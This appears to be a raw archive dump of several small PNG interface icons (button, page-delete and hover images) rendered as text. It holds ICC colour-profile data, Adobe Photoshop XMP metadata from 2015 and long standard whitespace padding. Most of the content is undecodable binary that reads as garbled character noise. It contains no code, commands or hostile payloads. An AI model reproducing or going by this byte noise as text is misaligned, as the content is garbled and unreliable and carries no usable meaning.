��z֘�0��*��@F�����dM�@CI	��L�=�l���M�����o>��9�s�n�DC�@�lap�����[��u��s{XY^ɂ�CY���A���(^Z���W���?,�ş��S�+�y�w�r���X�����'���sd�ps��&��n8Y^�~ڜ�[�,���>V}���?L_��Ý6�j8h\&+�e�^�e�^٭�^Qf��+?)gڤj��FN>l�|�-)ʯ������1�"�#�6���	!K�c���Л|x�����s2��x���ߺ��vY�1/��^�߫�� I�p	d.�P�ϛ��z�(<�Xg�r�ކ�����r9�Q�`�z)�w�\���f�E�
��\L�{��K}�6V��[�v3���g����RUU�6YĆ�%�?���<|Æ���m���~��]MBl��S�w���9k�%�ٍ͆��ܵ��
��]�ٹk7�.z�X�D��C���VE�V2#��1���9&�|#��V�Ӧ��L	ۑ�3�X��K�<��|m���Ƀl���d]I�e~�����y\5#��M��>�5%����C�qټ��(.�7�����t�;��+^x�U��+���_���_}��_}�G��,O<tG����]���2�f������&�j�ZFe0m�dFe�z���O��%����jr����yD�m��ʇ�e}A؆���i#����&����>�O](��C�.J�X�B`�<2n�?����x408l��9X썲��]��^�8`40�����;,��b9g���7�����@�50.�='��=?Oٮ1���~�
Q���h4�+�T����ɸ�X
Q.�R���5�r��kYU�fZ�ijsY�5��o�E�S��Ş
�4NP����bMB��X�16�������\�aU1TY�������T�x\@�4�7t��d��^^]�Ay�rP�}JY�g��c�ϟk6�K��`�PfM�3�le����|;k���óI/�egUu�a���Փ�m2�}����l/�5�Z���g��?���؍�D�?Fp�.�G�<>)��rشm�\4�]{���N�ưA9>cS'Lc�����0e�0��zYi��|�go����h`x�;\��%ߘ�V��g�'�X�
���d��VL�.�%1�|��*�r��U�O�,[	g��I�eY��H��^���N���h1��̹��Y��t�v*�s��~��.,'��e$��|�����4�3��9�k��������%)ê�w����~ꨪA�~hh4��Ypwdu��ρ�ޕY��=�V���e�c�����Q]�c�z��g{Gtb	�:�!ǁ+�@�Ĕ�^����)3����尷��,%K�2������U��,%�Kf*�R�vxJz��ﳟ�O��Ӧ2k�`f��K
��|mӆg%-ۉ����)��r�c�� �ӡ�og
e� ׿���j�i`��*s*&��N�6��#����IC}Ey*���{H��V\�;9]�3MC���55��Y��-w��C6�팬=/��d�/�~Q8��0Yf�YI�w�4�|`����z���4hӋV�1�5Z"�@kq����e�m��T�g�v���m��|�L�d��ӱ�a���M�,�4Z'�I�/ν��N�sy�ݒ��}�|'�G��h�[��^r��v�|��~��ʝ��s���8��y6�>N�6�`z���,���Uӯu�ye|;
�
�k�w�����X�~�?��o���6-�4%�������ij@��<�r��٥�;堢f>ة�}֔S5��ƷZ^xxv3+��H��S|�k�mi�K��zb�?"��9�՟ty>��e�X������#�5z�7�����|��mw?T9���
��N��R��
��~Hl���.w���+�|-�d�w�w����I$��>��5��	�t��K{y;ۻ�*�ۺ0�B�M�����m��D�8���p�#���5Gw���cӞP�g��s/o/�R���h4���.A���r�#P�;�����,k.�)�N�nǶ��J�C��7�CQ~���1�%�})�K���ۘ�s�߄�"��E�>\�b������{:,~c�{�g�e�iI��6(+�
�ɜa�bZ=������|��IZ�S�Wa�����IW����I���M�;���2�n���F �!b�|WLz��W-��Y������/	f�$�5su8cڮ�od��΋H#�D��+X�֎�K����
�~~h�f�p5Q_nC0k�C�< 舲_�&�g-�_�]m]�U��^7Σ�h�}���wO�s���3�;/G�t �_֏\�F�?�M@���b����5`~���۩�Սh1��b;�<���[��T���m���ݒ�Ѽ�}EOwd|�z���xOđ���O���^je�^�1�S��*�?� ��;u8ep���\��c������c�Гm�?�&^z�4PwӺ�
g�ƭ�Ԇ	�|�ܲ�Wl�|�e���Ԃ@C�_h�7�k81����v��mB���\��4&B�v�ߌ�����
�qOF(�9�!T�m؀��~Q�4��uc��7�z��B�s�iOpo�F�:�gm��r6t0ng7�S�2�F��h�c��2��n���iGp��EQ��-��<�:�ay��Ű�L_�
�J���u�\� �e�^lpD���z�j�)�D_JHv���n����<V6pN���+_�>�ҧ�=�;��[�=xZ��?�j�/%x-�˕�M!�ie�b k@�#��l3-qg��EJ>T��*>ce'�noЀ
V|����	M�`\0+�Y@a�Gt�M�:7��������h����V����I���ΰ��3��as;��
Lk�ᵢ�y�u���N��V7�G����Ń���uq��>��������f���f����.��~�i�(MA�’����DD��i�^b:"�h���YG���=�y��ag:��,���+����g]h�9���K�R�n��K}Y�(��J��2���u������J`��-�W9��E4�f?܉��y(���������i`��ڹ!�GY�k�e��� ����_sn�1g�<��mL?e]�Ii����9���s};��h4��9P)��Pn!�����)�
4^v>s�S��qtn���+�8�+�O:��X�]�q��k�;�yt��u�0����Ĝ���P�$�E�-rP�N��d9�Q�����Y�w�З�F����HmAn�}ĶIEND�B`�images/button6_4.png000060400000005301152434416630010346 0ustar00�PNG


IHDR�t�
7iCCPsRGB IEC61966-2.1x���wTS��Ͻ7�P����khRH
�H�.*1	J��"6DTpDQ��2(�C��"��Q��D�qp�Id�߼y�͛��~k����g�}ֺ����LX	��X��ň��g`�l�p��B�F�|،l���� ��*�?������Y"1P�����\�8=W�%�Oɘ�4M�0J�"Y�2V�s�,[|��e9�2�<�s��e���'�9���`���2�&c�tI�@�o�|N6(��.�sSdl-c�(2�-�y�H�_��/X������Z.$��&\S�������M���07�#�1ؙY�rf�Yym�";�8980m-m�(�]����v�^��D��W~�
��e���mi]�P����`/���u}q�|^R��,g+���\K�k)/��C_|�R����ax�8�t1C^7nfz�D����p�柇��u�$��/�ED˦L L��[���B�@������ٹ���ЖX�!@~(* 	{d+��}�G�͋љ���ς�}W�L��$�cGD2�Q��Z4 E@�@������A(�q`1��D ������`'�u�4�6pt�c�48.��`�R0��)�
�@���R�t C���X��CP�%CBH@�R����f�[�(t�
C��Qh�z#0	��Z�l�`O8�����28.����p|�O�X
?���:��0�FB�x$	!���i@ڐ���H���[EE1PL���⢖�V�6��QP��>�U�(j
�MFk�����t,:��.FW������8���c�1�L&���ӎ9�ƌa��X�:��
�r�bl1�
{{{;�}�#�tp�8_\<N�+�U�Zp'pWp���������e�F|~?��!(�	��HB*a-���F8K�KxA$��N�p����XI<D<O%�%QHf$6)�$!m!�'�"�"� ��Fdr<YL�Bn&�!�'�Q�*X*(�V+�(t*\Qx��W4T�T\���X�xDqH�^�H���QZ�T�tT�Ҵ2U�F9T9Cy�r���G,ň�C�Q�(�(g(cT��OeS��u�F�Y�8
C3��Ri��oh��)���J�J�J��q)�����2�a�u�;U-UOU��&�6�+����y���J���F�ީ3�}��Է�w���@i�i�k�j��8��tm��9���ք5�4#4Wh��М������Ҫ�:��T�����C����U�MG��C��c�
Ó�Ψd�1�t5u�u%�����3z�zQz�z�z��	�,�$����S:!��
�,��]�������b�6u=2V30�7n5�kB6q7Yf�`r�c�2M3�mz�6�7K1�12����͇-�NB��Lӓ��le�Z�-�--�,�YX�[m��hmo�n�h}džbhSh�c󫭙-׶��\�\߹��v�}ngnǷ�cwӞjb��������ȡ�a��1ѱ����
cmf�wB;y9�v:����Y�|��K�K�ˣy���獹�r\�]�n�D��nRw]w�{��}�G�DŽ��g��A�g^�^"���lg�J�)o��ϻ�{Ї��S�s�W�7ٷ�w���o��)���6�Z܀怩@���}A��A�A�͂E�=!pH`����
��w��Ѐ��ŒÖ�}�	�	aQѿ��`ɂ��"�"�"�D�DI�z�����_�xǔ�Hc�bW�^�ӈ�u�c����,ܹp<�>�8�"�Ey�.,�X�����%�%Gщ1�-��9����Ҁ��K��l�.��oo���/�O$�&�'=JvMޞ<��R��T�T����֥�NM۟�)=&�=���qTH�	�2�3�2��̳���˜��\6%
5eCً���4��Ԁ�D�^2��S��&7:�H�r�0o`���M�'�}�^�Z�]�[�[��`t���UЪ��zW�.Z=��ó���ik(�.,/|�.f]O�Vњ���~�[��E�76�l�ۈ�(�8�iMKx%K�K+J�o�n����W�_}ڒ�e�̡l�V�V����ܷ(W.�/���scGɎ�;��PaWQ���K�KZ\�]eP���}uJ�H�WM{�f��׻y������V�UWZ�n�`��z������}�}9�6F7����I�����~�~遈}͎��-�-e�p��u�`���x���l�o����$�����A�{����}g�]m����\�9Օ�%��>x��ǥ��{���=Vs\�x�	‰��N柜>�u�����c�Kz=s�/�o�l����|ϝ��?y�����^d]��p�s�~���:;���/;]��7|���W����p������Q�o�H�!�ɻ��V���sn��Ys}��ҽ����~4��]� =>�=:�`��;cܱ'?e��~��!�ań�D�#�G�&}'/?^�x�I֓���?+�\����w�x�20;5�\�ӯ�_�����e�t��W�f^��Qs�-�m���w3���+?�~���O�~���pf*	pHYs��~�0IDATx�c�bc������$ ,68I��f��kq�)��A��m�B�Ϙ�J�IEND�B`�images/page_delete.png000060400000044152152434416630010767 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�;�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-18T11:55:26+04:00</xmp:CreateDate>
         <xmp:MetadataDate>2015-11-18T11:55:26+04:00</xmp:MetadataDate>
         <xmp:ModifyDate>2015-11-18T11:55:26+04:00</xmp:ModifyDate>
         <xmpMM:InstanceID>xmp.iid:d278a975-701c-dc43-963c-4d374dafdee8</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:b7b92bfb-8dc9-11e5-908b-ca098794a1d9</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:ee59b710-4f46-6e4f-918e-6433726e2fa5</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:ee59b710-4f46-6e4f-918e-6433726e2fa5</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:55:26+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:d278a975-701c-dc43-963c-4d374dafdee8</stEvt:instanceID>
                  <stEvt:when>2015-11-18T11:55:26+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:3ff1f1b3-8c7a-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <dc:format>image/png</dc:format>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>39</exif:PixelXDimension>
         <exif:PixelYDimension>39</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>��� cHRMz%������u0�`:�o�_�F�IDATx�얻R�@@�Ŭ�!"I+B@|T����<�C��*�VF?�F+ã1���#��8����V��f��d��e+�e��0�.ե�T��?F�*�ĕ:=ĦA3�WR,맇�Q�]+�
b<
#sP�J	>RY^1���,�`DL(���*��P����鰔�8�m$Ͼ��
��u���t�qYJnt�`��J�,�+ߡ�O����P�eG�z�VUC�A�9�a�W ��d����f銱m�s"�Y��@�`�Ћ{V��;	�3NdMC�݁�/�+6
������XU
�{�˖����w�7��v�m�����b�M�c��[�bD�{��M��}�im�(*�C�A���R�����0/U��w��A Ɍgb���)LJm��~~ҏ���d?��Y�QQ ,��R���LJT�C �Z������m�4.�`8�M��D�6/�g0ŏ&Rsv�����\�Ku�o�a�\A7�IEND�B`�images/page_delete_hover.png000060400000045016152434416630012172 0ustar00�PNG


IHDR''��b	pHYs��
OiCCPPhotoshop ICC profilexڝSgTS�=���BK���KoR RB���&*!	J�!��Q�EEȠ�����Q,�
��!��������{�kּ�����>�����H3Q5��B������.@�
$p�d!s�#�~<<+"��x��M��0���B�\���t�8K�@z�B�@F���&S�`�cb�P-`'������{[�!�� e�Dh;��V�EX0fK�9�-0IWfH�����0Q��){`�##x��F�W<�+��*x��<�$9E�[-qWW.(�I+6aa�@.�y�2�4�������x����6��_-��"bb��ϫp@�t~�,/��;�m��%�h^�u��f�@����W�p�~<<E���������J�B[a�W}�g�_�W�l�~<�����$�2]�G�����L�ϒ	�b��G�����"�Ib�X*�Qq�D���2�"�B�)�%�d��,�>�5�j>{�-�]c�K'Xt���o��(�h���w��?�G�%�fI�q^D$.Tʳ?�D��*�A�,����`6�B$��BB
d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�=CiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-20T13:09:21+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2015-11-20T19:57:45+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2015-11-20T19:57:45+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:3ff1f1b3-8c7a-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:87fd4ba7-8c73-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>adobe:docid:photoshop:d31096f8-8dc8-11e5-908b-ca098794a1d9</rdf:li>
               <rdf:li>xmp.did:90eaadfa-1016-ed46-82dd-4ae7a991a8dc</rdf:li>
               <rdf:li>xmp.did:f562aca2-fc36-4c47-8294-8d2eaade51e7</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <xmpMM:InstanceID>xmp.iid:b54eee95-4b22-6f41-9218-5ae11fba0d6d</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:6cfeae69-8f9f-11e5-94a6-ee3452282a2a</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:5476137a-0bb7-ec4b-b42e-740aadc0c68d</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:5476137a-0bb7-ec4b-b42e-740aadc0c68d</stEvt:instanceID>
                  <stEvt:when>2015-11-20T13:09:21+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:b54eee95-4b22-6f41-9218-5ae11fba0d6d</stEvt:instanceID>
                  <stEvt:when>2015-11-20T19:57:45+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>39</exif:PixelXDimension>
         <exif:PixelYDimension>39</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>|\) cHRMz%������u0�`:�o�_�F�IDATx���V�@����4�îi&��n}ϑ��RP_HM1���LW.ڕ)i�`b�j�q��%v��p�3��3�~3໹̽x�5�fԌ�x�$QFz�9��"��@�8���0�o�k�@�Q̈́Z�e�n9OCJH��������˿e�"݄j�fg�k�a%�@�P͂Z�&�]	�
�s�����b�N�@Q͚,�9V�`��:����	D	���D�=;�)�6�
�bX|A�;8�qQ�j�ی��g���{zw�Ⱦ��[��'�+	|��ݓ�ž���Ԟy�%H�{;��C
�=��n�R�_�)�8Q�\�#QB���O���|Z�
���PE�4�0Q�*w��@�<,�Tx;[^{�"�ʽ~���Fbc�U@���{��D;�u^��\+����*yV*v�'?�� !���Ŏ�r��.}L������A���;6]��??�R�#���~�g����Q3������n
=��IEND�B`�images/10/next.png000060400000002045152434416630007722 0ustar00�PNG


IHDR
